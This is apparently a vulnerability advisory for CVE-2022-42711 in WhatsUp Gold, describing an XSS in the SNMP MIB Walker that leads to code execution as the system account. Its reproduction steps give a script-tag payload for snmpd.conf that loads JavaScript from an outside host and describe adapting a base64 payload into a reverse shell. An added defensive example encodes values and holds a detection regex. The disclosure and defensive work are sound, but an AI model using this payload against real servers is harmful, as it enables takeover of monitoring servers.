WhatsUp Gold 2022

< v. 22.1.0

https://nvd.nist.gov/vuln/detail/CVE-2022-42711
https://community.progress.com/s/article/Product-Alert-Bulletin-October-2022

Improper validation of strings from SNMP devices when using the SNMP MIB Walker makes the application prone to a reflected XSS attack.
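
One way to handle the device-supplied strings described above, as an added example that is not code from WhatsUp Gold or from the author of this advisory: HTML-encode every SNMP value when it is rendered, and flag values that carry active markup for review. The function names, row format and regex are assumptions; the sample rows are constructed from the snmpd.conf values shown in the steps on this page.

```javascript
// Added example: every string returned by an SNMP agent is untrusted input.
// Constructed sample of a MIB walk result (system group OIDs).
const sampleWalk = [
  { oid: "1.3.6.1.2.1.1.4.0", name: "sysContact", value: "Me <me@example.org>" },
  { oid: "1.3.6.1.2.1.1.6.0", name: "sysLocation", value: "Home" },
  { oid: "1.3.6.1.2.1.1.5.0", name: "sysName",
    value: "LinuxPC<script src='https://f20.be/t.js'/>" },
];

const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
};

// Context-appropriate output encoding for HTML element content and
// quoted attribute values. This is the actual defense.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Heuristic (assumption) used only for alerting. Legitimate values such as
// sysContact "Me <me@example.org>" contain angle brackets, so rejecting
// every "<" would break normal devices; encoding handles both cases.
const ACTIVE_MARKUP =
  /<\s*(script|img|svg|iframe|object|embed|link|style)\b|\bon[a-z]+\s*=/i;

// Build table rows for the walker output with every cell encoded.
function renderWalkRows(rows) {
  return rows
    .map((r) =>
      "<tr><td>" + escapeHtml(r.oid) + "</td><td>" + escapeHtml(r.name) +
      "</td><td>" + escapeHtml(r.value) + "</td></tr>")
    .join("\n");
}

// Return the OIDs whose values look like injected markup, for logging.
function suspiciousRows(rows) {
  return rows.filter((r) => ACTIVE_MARKUP.test(r.value)).map((r) => r.oid);
}

console.log(renderWalkRows(sampleWalk));
console.log("flagged:", suspiciousRows(sampleWalk));
```

The encoded output displays the sysName string as literal text in the browser, and the sysContact address still renders correctly.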

Steps To Reproduce:

  1. Place an XSS payload in the SNMPD.conf on a Linux computer. Have the payload open a JavaScript file hosted on an HTTPS web server (because WhatsUp Gold uses HTTPS, you cannot link to an HTTP web server). SNMP walk the Linux computer's IP.
  2. Modify the script below to run a reverse shell. You can base64-decode my payload, change the IP and port, then base64-encode it again and put it in the script. Or run another payload, of course.
  3. Save the script on a web server.
  4. Add the XSS pointing at the URL of the script in the SNMPD config; I placed it in sysName:
    sysContact Me <me@example.org>
    sysLocation Home
    sysName LinuxPC<script src='https://f20.be/t.js'/>
  5. Open the SNMP MIB Walker tool and "walk" the IP address of the Linux computer.

Script

Function of script

Impact

The attacker will have remote code execution as the "NT System" account, which means full control of the server.

POC Video